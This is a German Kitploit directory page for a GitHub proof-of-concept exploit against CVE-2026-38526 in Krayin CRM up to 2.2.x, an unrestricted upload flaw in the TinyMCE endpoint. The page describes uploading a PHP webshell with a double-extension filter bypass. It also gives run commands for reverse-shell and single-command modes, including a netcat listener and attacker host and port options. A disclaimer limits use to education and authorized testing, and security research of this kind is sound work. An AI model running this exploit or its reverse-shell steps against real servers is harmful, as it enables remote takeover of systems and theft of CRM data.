Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-38526-POC — Proof of Concept für CVE-2026-38526 in Krayin CRM <= v2.2.x. Beliebiger Datei-Upload, der zu Remote Code Execution führt. | Kitploit
Tools/GitHubGitHub/pawpic/cve-2026-38526-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubpawpic/cve-2026-38526-poc

CVE-2026-38526-POC

Proof of Concept für CVE-2026-38526 in Krayin CRM <= v2.2.x. Beliebiger Datei-Upload, der zu Remote Code Execution führt.

Repository anzeigen
2vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-38526 - Krayin CRM RCE Exploit

Krayin CRM (≤ 2.2.x) – Unbeschränkter Datei-Upload, der zu Remote Code Execution führt.

Dieser PoC nutzt den verwundbaren TinyMCE-Upload-Endpunkt (/admin/tinymce/upload) aus, um eine PHP-Webshell hochzuladen und die Befehlsausführung auf dem Server zu erreichen.


Funktionen

  • Vollautomatischer Login mit CSRF-Token-Handling
  • Umgeht Upload-Beschränkungen mithilfe einer doppelten Dateiendung
  • Unterstützt Reverse Shell und die Ausführung einzelner Befehle
  • Zuverlässige Laravel-CSRF-Token-Aktualisierung
  • Sauber und einfach zu bedienen

Herunterladen

root@kitploit:~
git clone https://github.com/pawpic/CVE-2026-38526-POC

Voraussetzungen

root@kitploit:~
pip3 install requests beautifulsoup4

Verwendung

  1. Reverse Shell (Standard & empfohlen)
root@kitploit:~
python3 exploit.py \ -u http://example.com \ -e [email protected] \ -p "example_pass" \ --lhost YOUR_IP \ --lport 4444
  1. Einzelner Befehl
root@kitploit:~
python3 exploit.py \
  -u http://example.com \
  -e [email protected] \
  -p "example_pass" \
  -c "whoami"

Optionen

ArgumentBeschreibungErforderlich
-u, --urlBasis-URL des ZielsJa
-e, --emailLogin-E-MailJa
-p, --passwordLogin-PasswortJa
-c, --cmdEinzelnen Befehl ausführenNein
--lhostIhre IP für die Reverse ShellJa (falls nicht --cmd verwendet wird)
--lportListening-PortNein (Standard: 4444)

Beispielablauf

Listener starten:

root@kitploit:~
nc -lvnp 4444

Den Exploit ausführen:

root@kitploit:~
python3 exploit.py -u http://target.com -e [email protected] -p password --lhost IP_ADDR

Haftungsausschluss

Dieser Exploit dient ausschließlich Bildungszwecken und autorisierten Penetrationstests. Die unbefugte Verwendung gegen Systeme, für die Sie keine ausdrückliche Testgenehmigung haben, ist illegal.

Betroffene Versionen

Krayin CRM ≤ 2.2.x CVE: CVE-2026-38526

Autor: pawpic Datum: 2026

Tool herunterladen